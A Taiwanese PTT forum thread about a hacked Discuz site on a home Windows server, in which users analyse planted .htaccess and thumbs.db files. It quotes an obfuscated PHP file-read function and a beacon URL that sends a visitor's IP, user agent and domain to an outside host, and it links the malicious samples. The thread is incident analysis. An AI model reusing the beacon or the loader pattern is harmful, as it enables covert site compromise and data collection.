經過了這陣子的煎熬 我大概能夠猜到 他是利用 discuz 的 sql漏洞 搞出來的結果 更新後..現在應該解決了... 再試看看會不會發生這樣的問題吧... ※ 引述《kidbaby (幸福的進行式)》之銘言： : ※ 引述《mervynW (.)》之銘言： : : 先解到這邊. 建議你. passwd 全換一換吧 : : function evaloPoIEXQacJTquN($s) {return @file_get_contents($s);} : : 他老兄要抓你的local file 都沒問題啦. : : DB 應該也被趴走了吧 (茶) : : 要找這種code最快的就是從 eval replace echo. : : cp 2~3次就可以看到他的code了. : : eval 拿掉也沒辦法執行 (茶), 所以變無害的 code : : 解到最後, 這傢伙還沒那麼壞嘛. : : file_get_contents :: : : http://cacacacacacacacacaca.ca/in.php? : : i=CLIENT_IP : : &b=USER_AGENT : : &h=DOMAIN_NAME : : 最終結果是,知道你網站流量,分析你網站值不值的攻擊 : 太慘了 ........................... : 我有些私密的東西放在這個網域裡面的儲存裝置 (不是在這個server) 慘慘慘 : 我大概說明一下 : 我的網站是 : 中華電信 50m/5m : 硬體 i5-2400 + ASRock h67m-itx + 4G*2 ddr3 + Intel SSD x25-m G2 34nm 80G. : windows 7 旗艦版 + Appserv v2.5.10 架的 : 在www目錄下被放置 .htaccess 跟 thumbs.db 兩個檔案 時間是 2011/8/9號上午12:04分 : 可是我上一次更動上面三個網站的東西 應該都在8/9之前 : 看樣子不像是掛了什麼模組內藏了這兩個檔案被偷放 : 所以我完全不了解他什麼時候放的 : 這台電腦也沒有掛ftp (不過別台有) : 他到底是怎麼放的呢.... : http://dl.dropbox.com/u/12118398/Thumbs222.zip : 我把這兩個檔案放出來 看看有沒有高手能完全解譯他...囧 : 這下真的囧了......... : 真的沒偷抓檔案嗎....@@ : 還是偷抓我網芳的檔案....? 那我就完了...= =" -- <囧>" 打擊~ ■ ㄥㄥ --

※ 發信站: 批踢踢實業坊(ptt.cc) ◆ From: 114.32.247.164